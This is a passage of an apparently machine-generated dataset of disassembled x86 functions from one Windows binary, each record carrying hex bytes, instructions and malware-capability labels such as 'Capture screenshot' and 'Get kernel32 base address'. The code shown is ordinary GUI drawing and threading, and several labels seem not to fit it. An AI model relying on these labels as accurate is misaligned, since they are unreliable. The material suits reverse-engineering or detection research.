"mov ebp, dword [esi + 0x4c]",
"cmp edx, ecx",
"jne 0x44abd3",
"cmp edi, ebp",
"jg 0x44ac87",
"add ebp, dword [eax + 4]",
"jmp 0x44abe0",
"cmp edi, ebp",
"jge 0x44abe0",
"sub ebp, dword [eax + 4]",
"cmp edi, ebp",
"jle 0x44abe0",
"mov ebp, edi",
"cmp ebp, 0xffffffff",
"je 0x44ac87",
"mov ecx, ebx",
"call fcn.00440710",
"cmp eax, ebp",
"jle 0x44ac01",
"mov ecx, ebx",
"call fcn.00440710",
"mov dword [esp + 0x10], eax",
"jmp 0x44ac05",
"mov dword [esp + 0x10], ebp",
"mov ecx, ebx",
"call fcn.00440680",
"mov ecx, dword [esp + 0x10]",
"dec eax",
"cmp eax, ecx",
"mov ecx, ebx",
"jge 0x44ac1f",
"call fcn.00440680",
"dec eax",
"jmp 0x44ac33",
"call fcn.00440710",
"cmp eax, ebp",
"jle 0x44ac31",
"mov ecx, ebx",
"call fcn.00440710",
"jmp 0x44ac33",
"mov eax, ebp",
"mov ecx, dword [esi + 0x48]",
"push eax",
"lea edx, [esp + 0xb4]",
"push ecx",
"push edx",
"mov ecx, esi",
"call fcn.00448500",
"push eax",
"lea eax, [esp + 0x30]",
"push eax",
"call dword [sym.imp.USER32.dll_CopyRect]",
"mov eax, dword [esp + 0x2c]",
"cmp eax, 0xffffffff",
"je 0x44ac76",
"mov ecx, dword [esp + 0x30]",
"mov edx, dword [esp + 0x38]",
"mov dword [esi + 0x4c], eax",
"mov eax, dword [esp + 0x34]",
"mov dword [esi + 0x48], ecx",
"mov dword [esi + 0x50], edx",
"mov dword [esi + 0x54], eax",
"jmp 0x44ac87",
"push 1",
"push 0",
"push 0",
"push 0",
"push 0",
"mov ecx, esi",
"call fcn.00446d00",
"mov ecx, ebx",
"call fcn.00440680",
"dec eax",
"cmp eax, edi",
"jge 0x44ac9d",
"mov ecx, ebx",
"call fcn.00440680",
"dec eax",
"jmp 0x44ac9f",
"mov eax, edi",
"test eax, eax",
"jge 0x44aca7",
"xor edi, edi",
"jmp 0x44acbd",
"mov ecx, ebx",
"call fcn.00440680",
"dec eax",
"cmp eax, edi",
"jge 0x44acbd",
"mov ecx, ebx",
"call fcn.00440680",
"mov edi, eax",
"dec edi",
"mov ecx, ebx",
"call fcn.00440640",
"xor ebp, ebp",
"mov dword [esp + 0x10], eax",
"test eax, eax",
"jle 0x44acea",
"push edi",
"push ebp",
"mov ecx, ebx",
"call fcn.00440760",
"test eax, 0x40000",
"je 0x44ace3",
"dec edi",
"xor ebp, ebp",
"jmp 0x44ace4",
"inc ebp",
"cmp ebp, dword [esp + 0x10]",
"jl 0x44acce",
"mov ecx, ebx",
"mov dword [esp + 0x18], 0",
"call fcn.00440710",
"cmp edi, eax",
"jge 0x44ad35",
"lea ecx, [esp + 0x68]",
"push ecx",
"mov ecx, esi",
"call fcn.004441e0",
"mov edx, dword [eax]",
"xor ebx, ebx",
"test edi, edi",
"mov dword [esp + 0x14], edx",
"jle 0x44ad80",
"push ebx",
"mov ecx, esi",
"call fcn.00444100",
"push eax",
"mov eax, dword [esp + 0x18]",
"push eax",
"mov ecx, esi",
"call fcn.004442c0",
"inc ebx",
"mov dword [esp + 0x14], eax",
"cmp ebx, edi",
"jl 0x44ad15",
"jmp 0x44ad80",
"push 1",
"push 1",
"push edi",
"lea ecx, [esp + 0x9c]",
"push 0",
"push ecx",
"mov ecx, esi",
"call fcn.00447470",
"cmp dword [eax], 0",
"jge 0x44ad54",
"xor edi, edi",
"jmp 0x44ad6c",
"push 1",
"push 1",
"push edi",
"lea edx, [esp + 0xac]",
"push 0",
"push edx",
"mov ecx, esi",
"call fcn.00447470",
"mov edi, dword [eax]",
"lea eax, [esp + 0x78]",
"mov ecx, esi",
"push eax",
"call fcn.00446430",
"mov ecx, dword [eax]",
"add ecx, edi",
"mov dword [esp + 0x14], ecx",
"push 0",
"lea ecx, [esp + 0x50]",
"call fcn.004b3499",
"mov edx, dword [esi + 0x5c]",
"mov eax, dword [esi + 0x58]",
"push edx",
"lea ecx, [esp + 0x50]",
"push eax",
"push ecx",
"mov dword [esp + 0x104], 1",
"call fcn.0045b020",
"mov eax, dword [esp + 0x60]",
"add esp, 0xc",
"lea edx, [esp + 0x14]",
"push 1",
"push edx",
"push eax",
"call dword [sym.imp.GDI32.dll_LPtoDP]",
"mov edx, dword [esi + 0x1c]",
"lea ecx, [esp + 0x3c]",
"push ecx",
"push edx",
"call dword [sym.imp.USER32.dll_GetClientRect]",
"mov eax, dword [esp + 0x14]",
"lea ecx, [esp + 0x3c]",
"push ecx",
"mov dword [esp + 0x40], eax",
"call dword [sym.imp.USER32.dll_IsRectEmpty]",
"test eax, eax",
"jne 0x44adf3",
"push eax",
"mov eax, dword [esi + 0x1c]",
"lea edx, [esp + 0x40]",
"push edx",
"push eax",
"call dword [sym.imp.USER32.dll_InvalidateRect]",
"lea ecx, [esp + 0x4c]",
"mov dword [esp + 0xf8], 0xffffffff",
"call fcn.004b350b",
"jmp case.default.0x44a824",
"mov eax, dword [esp + 0x108]",
"mov ecx, dword [eax + 4]",
"mov edi, dword [eax + 0xc]",
"mov edx, dword [eax]",
"mov eax, dword [eax + 8]",
"mov dword [esp + 0x1c], ecx",
"lea ecx, [edi + ecx - 1]",
"mov dword [esp + 0x24], ecx",
"mov dword [esp + 0x20], edx",
"lea ecx, [eax + edx - 1]",
"lea edx, [esp + 0x1c]",
"mov dword [esp + 0x28], ecx",
"push edx",
"mov ecx, ebx",
"call fcn.00440ff0",
"mov ecx, dword [esp + 0x24]",
"mov eax, dword [esp + 0x1c]",
"mov edx, dword [esp + 0x28]",
"sub ecx, eax",
"inc ecx",
"push ecx",
"mov ecx, dword [esp + 0x24]",
"sub edx, ecx",
"inc edx",
"push edx",
"push eax",
"lea eax, [esp + 0xcc]",
"push ecx",
"push eax",
"mov ecx, esi",
"call fcn.004467a0",
"lea ecx, [esp + 0x1c]",
"push eax",
"push ecx",
"call dword [sym.imp.USER32.dll_CopyRect]",
"push 1",
"lea edx, [esp + 0x20]",
"push 1",
"push edx",
"call dword [sym.imp.USER32.dll_InflateRect]",
"mov ecx, dword [esi + 0x1c]",
"lea eax, [esp + 0x1c]",
"push 0",
"push eax",
"push ecx",
"call dword [sym.imp.USER32.dll_InvalidateRect]",
"mov ecx, esi",
"call fcn.00446bd0",
"jmp case.default.0x44a824"
] |
f53a5abe6cd77afda63f23dd6f0e75472256e1f40737ab4e61eea0208fed039d
|
0x44b6a0
|
[
"Access peb ldr_data",
"Get kernel32 base address"
] |
6aff6817b54b0064a10000000050648925000000005153568bf1578974240c8d4e08e8597cfcffa1cc62500033db895c24188946248b0dcc625000894e288b15cc62500089562c8d4e30c644241803e82c7cfcff8d5648b91c00000033c08bfaf3ab8d8e94040000c644241804c70257454442c7420400000100e8230406008b4c2410c706e8014e00895e1c895e20899eb8000000899ebc000000899ec4000000899ec8000000c786cc000000ffffffff899ed0000000899ea80400008bc65f5e5b64890d0000000083c410c3
|
[
"push 0xffffffffffffffff",
"push 0x4bb517",
"mov eax, dword fs:[0]",
"push eax",
"mov dword fs:[0], esp",
"push ecx",
"push ebx",
"push esi",
"mov esi, ecx",
"push edi",
"mov dword [esp + 0xc], esi",
"lea ecx, [esi + 8]",
"call fcn.00413320",
"mov eax, dword [0x5062cc]",
"xor ebx, ebx",
"mov dword [esp + 0x18], ebx",
"mov dword [esi + 0x24], eax",
"mov ecx, dword [0x5062cc]",
"mov dword [esi + 0x28], ecx",
"mov edx, dword [0x5062cc]",
"mov dword [esi + 0x2c], edx",
"lea ecx, [esi + 0x30]",
"mov byte [esp + 0x18], 3",
"call fcn.00413320",
"lea edx, [esi + 0x48]",
"mov ecx, 0x1c",
"xor eax, eax",
"mov edi, edx",
"rep stosd dword es:[edi], eax",
"lea ecx, [esi + 0x494]",
"mov byte [esp + 0x18], 4",
"mov dword [edx], 0x42444557",
"mov dword [edx + 4], 0x10000",
"call fcn.004abb42",
"mov ecx, dword [esp + 0x10]",
"mov dword [esi], 0x4e01e8",
"mov dword [esi + 0x1c], ebx",
"mov dword [esi + 0x20], ebx",
"mov dword [esi + 0xb8], ebx",
"mov dword [esi + 0xbc], ebx",
"mov dword [esi + 0xc4], ebx",
"mov dword [esi + 0xc8], ebx",
"mov dword [esi + 0xcc], 0xffffffff",
"mov dword [esi + 0xd0], ebx",
"mov dword [esi + 0x4a8], ebx",
"mov eax, esi",
"pop edi",
"pop esi",
"pop ebx",
"mov dword fs:[0], ecx",
"add esp, 0x10",
"ret"
] |
f53a5abe6cd77afda63f23dd6f0e75472256e1f40737ab4e61eea0208fed039d
|
0x451290
|
[
"Access peb ldr_data"
] |
64a1000000006aff6818ba4b00506489250000000083ec1453558b6c2430568bd9578b75008b4e0c8b4610493bc17d0940894610e9130100008b433c8b4e083bc8750ab8c7ffffffe9010100008b368b56108b4e0c3bd17c0539460875ef39460875148b46108b4e0c3bc17c0ab8c7ffffffe9d70000008b460433ff3bc7740b508bcbe8a8f7ffff897e048975008b4e1041894e108d4c2410e8f21ffcff897c242c8b7c243c85ff75128b4b048b51088d4c241052e8f61ffcff8bf88b460857508bcbe8d8eeffff85c089442438741f8d4c2410c744242cffffffffc7442410a8cf4d00e8a721fcff8b442438eb5f8b4e1051578bcbe865fdffff8a1780e20180fa01752e8b4c2434555157508bcbe86cfdffff8bf085f675498b550050578bcb894210e837fdffff8a0f80e10180f90174d28d4c2410c744242cffffffffc7442410a8cf4d00e84421fcff33c08b4c24245f5e5d5b64890d0000000083c420c20c008d4c2410c744242cffffffffc7442410a8cf4d00e81421fcff8bc6ebce
|
[
"mov eax, dword fs:[0]",
"push 0xffffffffffffffff",
"push 0x4bba18",
"push eax",
"mov dword fs:[0], esp",
"sub esp, 0x14",
"push ebx",
"push ebp",
"mov ebp, dword [esp + 0x30]",
"push esi",
"mov ebx, ecx",
"push edi",
"mov esi, dword [ebp]",
"mov ecx, dword [esi + 0xc]",
"mov eax, dword [esi + 0x10]",
"dec ecx",
"cmp eax, ecx",
"jge 0x4512c9",
"inc eax",
"mov dword [esi + 0x10], eax",
"jmp 0x4513dc",
"mov eax, dword [ebx + 0x3c]",
"mov ecx, dword [esi + 8]",
"cmp ecx, eax",
"jne 0x4512dd",
"mov eax, 0xffffffc7",
"jmp 0x4513de",
"mov esi, dword [esi]",
"mov edx, dword [esi + 0x10]",
"mov ecx, dword [esi + 0xc]",
"cmp edx, ecx",
"jl 0x4512ee",
"cmp dword [esi + 8], eax",
"jne 0x4512dd",
"cmp dword [esi + 8], eax",
"jne 0x451307",
"mov eax, dword [esi + 0x10]",
"mov ecx, dword [esi + 0xc]",
"cmp eax, ecx",
"jl 0x451307",
"mov eax, 0xffffffc7",
"jmp 0x4513de",
"mov eax, dword [esi + 4]",
"xor edi, edi",
"cmp eax, edi",
"je 0x45131b",
"push eax",
"mov ecx, ebx",
"call fcn.00450ac0",
"mov dword [esi + 4], edi",
"mov dword [ebp], esi",
"mov ecx, dword [esi + 0x10]",
"inc ecx",
"mov dword [esi + 0x10], ecx",
"lea ecx, [esp + 0x10]",
"call fcn.00413320",
"mov dword [esp + 0x2c], edi",
"mov edi, dword [esp + 0x3c]",
"test edi, edi",
"jne 0x45134c",
"mov ecx, dword [ebx + 4]",
"mov edx, dword [ecx + 8]",
"lea ecx, [esp + 0x10]",
"push edx",
"call fcn.00413340",
"mov edi, eax",
"mov eax, dword [esi + 8]",
"push edi",
"push eax",
"mov ecx, ebx",
"call fcn.00450230",
"test eax, eax",
"mov dword [esp + 0x38], eax",
"je 0x45137f",
"lea ecx, [esp + 0x10]",
"mov dword [esp + 0x2c], 0xffffffff",
"mov dword [esp + 0x10], 0x4dcfa8",
"call fcn.00413520",
"mov eax, dword [esp + 0x38]",
"jmp 0x4513de",
"mov ecx, dword [esi + 0x10]",
"push ecx",
"push edi",
"mov ecx, ebx",
"call fcn.004510f0",
"mov dl, byte [edi]",
"and dl, 1",
"cmp dl, 1",
"jne 0x4513c3",
"mov ecx, dword [esp + 0x34]",
"push ebp",
"push ecx",
"push edi",
"push eax",
"mov ecx, ebx",
"call fcn.00451110",
"mov esi, eax",
"test esi, esi",
"jne 0x4513f3",
"mov edx, dword [ebp]",
"push eax",
"push edi",
"mov ecx, ebx",
"mov dword [edx + 0x10], eax",
"call fcn.004510f0",
"mov cl, byte [edi]",
"and cl, 1",
"cmp cl, 1",
"je 0x451395",
"lea ecx, [esp + 0x10]",
"mov dword [esp + 0x2c], 0xffffffff",
"mov dword [esp + 0x10], 0x4dcfa8",
"call fcn.00413520",
"xor eax, eax",
"mov ecx, dword [esp + 0x24]",
"pop edi",
"pop esi",
"pop ebp",
"pop ebx",
"mov dword fs:[0], ecx",
"add esp, 0x20",
"ret 0xc",
"lea ecx, [esp + 0x10]",
"mov dword [esp + 0x2c], 0xffffffff",
"mov dword [esp + 0x10], 0x4dcfa8",
"call fcn.00413520",
"mov eax, esi",
"jmp 0x4513de"
] |
f53a5abe6cd77afda63f23dd6f0e75472256e1f40737ab4e61eea0208fed039d
|
0x454560
|
[
"Create thread"
] |
5183b9cc0000000174568b411c85c0744f8b81b000000085c0744556ba050000008bb1bc0000003bf25e74348981b4000000c78194000000000000008991bc0000008d442400506a005168004645006a006a00ff1588f34b0050ff15d0f34b0059c3
|
[
"push ecx",
"cmp dword [ecx + 0xcc], 1",
"je 0x4545c0",
"mov eax, dword [ecx + 0x1c]",
"test eax, eax",
"je 0x4545c0",
"mov eax, dword [ecx + 0xb0]",
"test eax, eax",
"je 0x4545c0",
"push esi",
"mov edx, 5",
"mov esi, dword [ecx + 0xbc]",
"cmp esi, edx",
"pop esi",
"je 0x4545c0",
"mov dword [ecx + 0xb4], eax",
"mov dword [ecx + 0x94], 0",
"mov dword [ecx + 0xbc], edx",
"lea eax, [esp]",
"push eax",
"push 0",
"push ecx",
"push 0x454600",
"push 0",
"push 0",
"call dword [sym.imp.KERNEL32.dll_CreateThread]",
"push eax",
"call dword [sym.imp.KERNEL32.dll_CloseHandle]",
"pop ecx",
"ret"
] |
f53a5abe6cd77afda63f23dd6f0e75472256e1f40737ab4e61eea0208fed039d
|
0x454610
|
[
"Capture screenshot",
"Check for time delay via gettickcount"
] |
6aff6828bd4b0064a100000000506489250000000083ec445355568bf1578b461c50ff1504f64b008bf8897c243ce82da802005057ff1578f14b008b2da4f14b0057ffd5578bd8ffd58be889bea4000000896c2410c7442418000000008b86c400000085c0740a8b86c400000085c075f6c786c4000000010000008b86c000000085c00f85b00000008b8ed80000008b96d4000000515257ff1574f14b0050558b2da0f04b008986c0000000ffd58944241c8b86dc000000508d4c2450e82cf105008b5424508b4c24108d44244cf7d81bc023c25051ffd58b96d80000008b4c24108944242c8b86d4000000682100f00052506a006a0051ff1594f04b008b54242c8b4424105250ffd58b4c241c8b5424105152ffd5c744244c083a4e008d4c244cc744245c00000000e859f00500c744245cffffffffeb068b2da0f04b00c786c400000000000000c78684000000040000008b86bc00000083f8010f84e7030000ff15c8f34b00894424488944242c8b86c400000085c0740a8b86c400000085c075f6c786c4000000010000008b86c00000008b4c24105051ffd58944241c8b868400000083f808740583f80c754c8b5424185253ffd58b4e548b565c682000cc00894424188b46586a006a0053508b4660518b4c2428525051ff159cf14b008b5424145253ffd58b44241850ff151cf14b00c7442418000000008bcec7868400000000000000e8d305000085c0894424200f84090200008b8e8400000083f908740583f90c754c8b4e588b5654515257ff1574f14b00505389442420ffd58b4e608b542410894424148b465c682000cc00508b4658518b4e545250516a006a0053ff159cf14b008b5424145253ffd58b4424205053ffd5894424148b868800000085c00f845f01000057ff15a4f14b00578be8ff15a4f14b008b4e548bf88b46586a006a016a015051ff15a8f04b008b56586a00894424348b46546a016a015250ff15a8f04b008b4c2430894424345155ff15a0f04b008b542434894424305257ff15a0f04b00894424388b86a00000005053ff1588f14b008b4e588b5654682000cc006a006a005351526a006a005789442458ff159cf14b008b4424345053ff1588f14b008b4e588b565468080033006a006a005751526a006a0055ff159cf14b008b46588b4e548b565c68c60088006a006a0057508b4660518b4c2428525051ff159cf14b008b56588b465468c60088006a006a005552506a006a0053ff159cf14b008b4e588b56548b465c688600ee006a006a0053518b4e60528b542428505152ff159cf14b008b4424305055ff15a0f04b0050ff151cf14b008b4c24385157ff15a0f04b0050ff151cf14b00558b2d70f04b00ffd557ffd58b7c243c8b2da0f04b00eb258b56588b46548b4e5c682000cc006a006a0053528b5660508b442428515250ff159cf14b008b4c24145153ffd58b54242052ff151cf14b008b461c50ff154cf64b0085c00f84860000008d4c24408d542444518d442428528d4c243050518bcee8611603008b86d0000000682000cc0085c074348b96d80000008b86d40000008b4c2414528b542448508b4424506a006a00518b4c243c528b54244450515257ff152cf14b00eb288b4424148b8ed80000008b96d40000006a006a00508b442434518b4c243c52505157ff159cf14b008b54241c8b4424105250ffd5c786c4000000000000008b869000000085c0740b8d0c80d1e1894c241ceb0a8b8e9c000000894c241c8b86bc00000083f8017440eb048b4c241c8b44242c8b5424482bc23bc8761d6a0aff1590f34b00ff15c8f34b008944242c8b86bc00000083f80175d18b86bc00000083f8010f8528fcffff8b44241885c0740750ff151cf14b00538b1d70f04b00ffd38b54241052ffd38b461c5750ff1510f64b00c786bc000000020000008b4c24545f5e5db8010000005b64890d0000000083c450c3
|
[
"push 0xffffffffffffffff",
"push 0x4bbd28",
"mov eax, dword fs:[0]",
"push eax",
"mov dword fs:[0], esp",
"sub esp, 0x44",
"push ebx",
"push ebp",
"push esi",
"mov esi, ecx",
"push edi",
"mov eax, dword [esi + 0x1c]",
"push eax",
"call dword [sym.imp.USER32.dll_GetDC]",
"mov edi, eax",
"mov dword [esp + 0x3c], edi",
"call fcn.0047ee70",
"push eax",
"push edi",
"call dword [sym.imp.GDI32.dll_SetStretchBltMode]",
"mov ebp, dword [sym.imp.GDI32.dll_CreateCompatibleDC]",
"push edi",
"call ebp",
"push edi",
"mov ebx, eax",
"call ebp",
"mov ebp, eax",
"mov dword [esi + 0xa4], edi",
"mov dword [esp + 0x10], ebp",
"mov dword [esp + 0x18], 0",
"mov eax, dword [esi + 0xc4]",
"test eax, eax",
"je 0x454681",
"mov eax, dword [esi + 0xc4]",
"test eax, eax",
"jne 0x454677",
"mov dword [esi + 0xc4], 1",
"mov eax, dword [esi + 0xc0]",
"test eax, eax",
"jne 0x454749",
"mov ecx, dword [esi + 0xd8]",
"mov edx, dword [esi + 0xd4]",
"push ecx",
"push edx",
"push edi",
"call dword [sym.imp.GDI32.dll_CreateCompatibleBitmap]",
"push eax",
"push ebp",
"mov ebp, dword [sym.imp.GDI32.dll_SelectObject]",
"mov dword [esi + 0xc0], eax",
"call ebp",
"mov dword [esp + 0x1c], eax",
"mov eax, dword [esi + 0xdc]",
"push eax",
"lea ecx, [esp + 0x50]",
"call fcn.004b37fe",
"mov edx, dword [esp + 0x50]",
"mov ecx, dword [esp + 0x10]",
"lea eax, [esp + 0x4c]",
"neg eax",
"sbb eax, eax",
"and eax, edx",
"push eax",
"push ecx",
"call ebp",
"mov edx, dword [esi + 0xd8]",
"mov ecx, dword [esp + 0x10]",
"mov dword [esp + 0x2c], eax",
"mov eax, dword [esi + 0xd4]",
"push 0xf00021",
"push edx",
"push eax",
"push 0",
"push 0",
"push ecx",
"call dword [sym.imp.GDI32.dll_PatBlt]",
"mov edx, dword [esp + 0x2c]",
"mov eax, dword [esp + 0x10]",
"push edx",
"push eax",
"call ebp",
"mov ecx, dword [esp + 0x1c]",
"mov edx, dword [esp + 0x10]",
"push ecx",
"push edx",
"call ebp",
"mov dword [esp + 0x4c], vtable.CGdiObject.0",
"lea ecx, [esp + 0x4c]",
"mov dword [esp + 0x5c], 0",
"call fcn.004b3798",
"mov dword [esp + 0x5c], 0xffffffff",
"jmp 0x45474f",
"mov ebp, dword [sym.imp.GDI32.dll_SelectObject]",
"mov dword [esi + 0xc4], 0",
"mov dword [esi + 0x84], 4",
"mov eax, dword [esi + 0xbc]",
"cmp eax, 1",
"je 0x454b59",
"call dword [sym.imp.KERNEL32.dll_GetTickCount]",
"mov dword [esp + 0x48], eax",
"mov dword [esp + 0x2c], eax",
"mov eax, dword [esi + 0xc4]",
"test eax, eax",
"je 0x454794",
"mov eax, dword [esi + 0xc4]",
"test eax, eax",
"jne 0x45478a",
"mov dword [esi + 0xc4], 1",
"mov eax, dword [esi + 0xc0]",
"mov ecx, dword [esp + 0x10]",
"push eax",
"push ecx",
"call ebp",
"mov dword [esp + 0x1c], eax",
"mov eax, dword [esi + 0x84]",
"cmp eax, 8",
"je 0x4547c0",
"cmp eax, 0xc",
"jne 0x45480c",
"mov edx, dword [esp + 0x18]",
"push edx",
"push ebx",
"call ebp",
"mov ecx, dword [esi + 0x54]",
"mov edx, dword [esi + 0x5c]",
"push 0xcc0020",
"mov dword [esp + 0x18], eax",
"mov eax, dword [esi + 0x58]",
"push 0",
"push 0",
"push ebx",
"push eax",
"mov eax, dword [esi + 0x60]",
"push ecx",
"mov ecx, dword [esp + 0x28]",
"push edx",
"push eax",
"push ecx",
"call dword [sym.imp.GDI32.dll_BitBlt]",
"mov edx, dword [esp + 0x14]",
"push edx",
"push ebx",
"call ebp",
"mov eax, dword [esp + 0x18]",
"push eax",
"call dword [sym.imp.GDI32.dll_DeleteObject]",
"mov dword [esp + 0x18], 0",
"mov ecx, esi",
"mov dword [esi + 0x84], 0",
"call fcn.00454df0",
"test eax, eax",
"mov dword [esp + 0x20], eax",
"je 0x454a32",
"mov ecx, dword [esi + 0x84]",
"cmp ecx, 8",
"je 0x454839",
"cmp ecx, 0xc",
"jne 0x454885",
"mov ecx, dword [esi + 0x58]",
"mov edx, dword [esi + 0x54]",
"push ecx",
"push edx",
"push edi",
"call dword [sym.imp.GDI32.dll_CreateCompatibleBitmap]",
"push eax",
"push ebx",
"mov dword [esp + 0x20], eax",
"call ebp",
"mov ecx, dword [esi + 0x60]",
"mov edx, dword [esp + 0x10]",
"mov dword [esp + 0x14], eax",
"mov eax, dword [esi + 0x5c]",
"push 0xcc0020",
"push eax",
"mov eax, dword [esi + 0x58]",
"push ecx",
"mov ecx, dword [esi + 0x54]",
"push edx",
"push eax",
"push ecx",
"push 0",
"push 0",
"push ebx",
"call dword [sym.imp.GDI32.dll_BitBlt]",
"mov edx, dword [esp + 0x14]",
"push edx",
"push ebx",
"call ebp",
"mov eax, dword [esp + 0x20]",
"push eax",
"push ebx",
"call ebp",
"mov dword [esp + 0x14], eax",
"mov eax, dword [esi + 0x88]",
"test eax, eax",
"je 0x4549fa",
"push edi",
"call dword [sym.imp.GDI32.dll_CreateCompatibleDC]",
"push edi",
"mov ebp, eax",
"call dword [sym.imp.GDI32.dll_CreateCompatibleDC]",
"mov ecx, dword [esi + 0x54]",
"mov edi, eax",
"mov eax, dword [esi + 0x58]",
"push 0",
"push 1",
"push 1",
"push eax",
"push ecx",
"call dword [sym.imp.GDI32.dll_CreateBitmap]",
"mov edx, dword [esi + 0x58]",
"push 0",
"mov dword [esp + 0x34], eax",
"mov eax, dword [esi + 0x54]",
"push 1",
"push 1",
"push edx",
"push eax",
"call dword [sym.imp.GDI32.dll_CreateBitmap]",
"mov ecx, dword [esp + 0x30]",
"mov dword [esp + 0x34], eax",
"push ecx",
"push ebp",
"call dword [sym.imp.GDI32.dll_SelectObject]",
"mov edx, dword [esp + 0x34]",
"mov dword [esp + 0x30], eax",
"push edx",
"push edi",
"call dword [sym.imp.GDI32.dll_SelectObject]",
"mov dword [esp + 0x38], eax",
"mov eax, dword [esi + 0xa0]",
"push eax",
"push ebx",
"call dword [sym.imp.GDI32.dll_SetBkColor]",
"mov ecx, dword [esi + 0x58]",
"mov edx, dword [esi + 0x54]",
"push 0xcc0020",
"push 0",
"push 0",
"push ebx",
"push ecx",
"push edx",
"push 0",
"push 0",
"push edi",
"mov dword [esp + 0x58], eax",
"call dword [sym.imp.GDI32.dll_BitBlt]",
"mov eax, dword [esp + 0x34]",
"push eax",
"push ebx",
"call dword [sym.imp.GDI32.dll_SetBkColor]",
"mov ecx, dword [esi + 0x58]",
"mov edx, dword [esi + 0x54]",
"push 0x330008",
"push 0",
"push 0",
"push edi",
"push ecx",
"push edx",
"push 0",
"push 0",
"push ebp",
"call dword [sym.imp.GDI32.dll_BitBlt]",
"mov eax, dword [esi + 0x58]",
"mov ecx, dword [esi + 0x54]",
"mov edx, dword [esi + 0x5c]",
"push 0x8800c6",
"push 0",
"push 0",
"push edi",
"push eax",
"mov eax, dword [esi + 0x60]",
"push ecx",
"mov ecx, dword [esp + 0x28]",
"push edx",
"push eax",
"push ecx",
"call dword [sym.imp.GDI32.dll_BitBlt]",
"mov edx, dword [esi + 0x58]",
"mov eax, dword [esi + 0x54]",
"push 0x8800c6",
"push 0",
"push 0",
"push ebp",
"push edx",
"push eax",
"push 0",
"push 0",
"push ebx",
"call dword [sym.imp.GDI32.dll_BitBlt]",
"mov ecx, dword [esi + 0x58]",
"mov edx, dword [esi + 0x54]",
"mov eax, dword [esi + 0x5c]",
"push 0xee0086",
"push 0",
"push 0",
"push ebx",
"push ecx",
"mov ecx, dword [esi + 0x60]",
"push edx",
"mov edx, dword [esp + 0x28]",
"push eax",
"push ecx",
"push edx",
"call dword [sym.imp.GDI32.dll_BitBlt]",
"mov eax, dword [esp + 0x30]",
"push eax",
"push ebp",
"call dword [sym.imp.GDI32.dll_SelectObject]",
"push eax",
"call dword [sym.imp.GDI32.dll_DeleteObject]",
"mov ecx, dword [esp + 0x38]",
"push ecx",
"push edi",
"call dword [sym.imp.GDI32.dll_SelectObject]",
"push eax",
"call dword [sym.imp.GDI32.dll_DeleteObject]",
"push ebp",
"mov ebp, dword [sym.imp.GDI32.dll_DeleteDC]",
"call ebp",
"push edi",
"call ebp",
"mov edi, dword [esp + 0x3c]",
"mov ebp, dword [sym.imp.GDI32.dll_SelectObject]",
"jmp 0x454a1f",
"mov edx, dword [esi + 0x58]",
"mov eax, dword [esi + 0x54]",
"mov ecx, dword [esi + 0x5c]",
"push 0xcc0020",
"push 0",
"push 0",
"push ebx",
"push edx",
"mov edx, dword [esi + 0x60]",
"push eax",
"mov eax, dword [esp + 0x28]",
"push ecx",
"push edx",
"push eax",
"call dword [sym.imp.GDI32.dll_BitBlt]",
"mov ecx, dword [esp + 0x14]",
"push ecx",
"push ebx",
"call ebp",
"mov edx, dword [esp + 0x20]",
"push edx",
"call dword [sym.imp.GDI32.dll_DeleteObject]",
"mov eax, dword [esi + 0x1c]",
"push eax",
"call dword [sym.imp.USER32.dll_IsWindow]",
"test eax, eax",
"je 0x454aca",
"lea ecx, [esp + 0x40]",
"lea edx, [esp + 0x44]",
"push ecx",
"lea eax, [esp + 0x28]",
"push edx",
"lea ecx, [esp + 0x30]",
"push eax",
"push ecx",
"mov ecx, esi",
"call fcn.004860c0",
"mov eax, dword [esi + 0xd0]",
"push 0xcc0020",
"test eax, eax",
"je 0x454aa2",
"mov edx, dword [esi + 0xd8]",
"mov eax, dword [esi + 0xd4]",
"mov ecx, dword [esp + 0x14]",
"push edx",
"mov edx, dword [esp + 0x48]",
"push eax",
"mov eax, dword [esp + 0x50]",
"push 0",
"push 0",
"push ecx",
"mov ecx, dword [esp + 0x3c]",
"push edx",
"mov edx, dword [esp + 0x44]",
"push eax",
"push ecx",
"push edx",
"push edi",
"call dword [sym.imp.GDI32.dll_StretchBlt]",
"jmp 0x454aca",
"mov eax, dword [esp + 0x14]",
"mov ecx, dword [esi + 0xd8]",
"mov edx, dword [esi + 0xd4]",
"push 0",
"push 0",
"push eax",
"mov eax, dword [esp + 0x34]",
"push ecx",
"mov ecx, dword [esp + 0x3c]",
"push edx",
"push eax",
"push ecx",
"push edi",
"call dword [sym.imp.GDI32.dll_BitBlt]",
"mov edx, dword [esp + 0x1c]",
"mov eax, dword [esp + 0x10]",
"push edx",
"push eax",
"call ebp",
"mov dword [esi + 0xc4], 0",
"mov eax, dword [esi + 0x90]",
"test eax, eax",
"je 0x454af5",
"lea ecx, [eax + eax*4]",
"shl ecx, 1",
"mov dword [esp + 0x1c], ecx",
"jmp 0x454aff",
"mov ecx, dword [esi + 0x9c]",
"mov dword [esp + 0x1c], ecx",
"mov eax, dword [esi + 0xbc]",
"cmp eax, 1",
"je 0x454b4a",
"jmp 0x454b10",
"mov ecx, dword [esp + 0x1c]",
"mov eax, dword [esp + 0x2c]",
"mov edx, dword [esp + 0x48]",
"sub eax, edx",
"cmp ecx, eax",
"jbe 0x454b3b",
"push 0xa",
"call dword [sym.imp.KERNEL32.dll_Sleep]",
"call dword [sym.imp.KERNEL32.dll_GetTickCount]",
"mov dword [esp + 0x2c], eax",
"mov eax, dword [esi + 0xbc]",
"cmp eax, 1",
"jne 0x454b0c",
"mov eax, dword [esi + 0xbc]",
"cmp eax, 1",
"jne 0x454772",
"mov eax, dword [esp + 0x18]",
"test eax, eax",
"je 0x454b59",
"push eax",
"call dword [sym.imp.GDI32.dll_DeleteObject]",
"push ebx",
"mov ebx, dword [sym.imp.GDI32.dll_DeleteDC]",
"call ebx",
"mov edx, dword [esp + 0x10]",
"push edx",
"call ebx",
"mov eax, dword [esi + 0x1c]",
"push edi",
"push eax",
"call dword [sym.imp.USER32.dll_ReleaseDC]",
"mov dword [esi + 0xbc], 2",
"mov ecx, dword [esp + 0x54]",
"pop edi",
"pop esi",
"pop ebp",
"mov eax, 1",
"pop ebx",
"mov dword fs:[0], ecx",
"add esp, 0x50",
"ret"
] |
f53a5abe6cd77afda63f23dd6f0e75472256e1f40737ab4e61eea0208fed039d
|
0x4551b5
|
[
"Resolve function by parsing pe exports"
] |
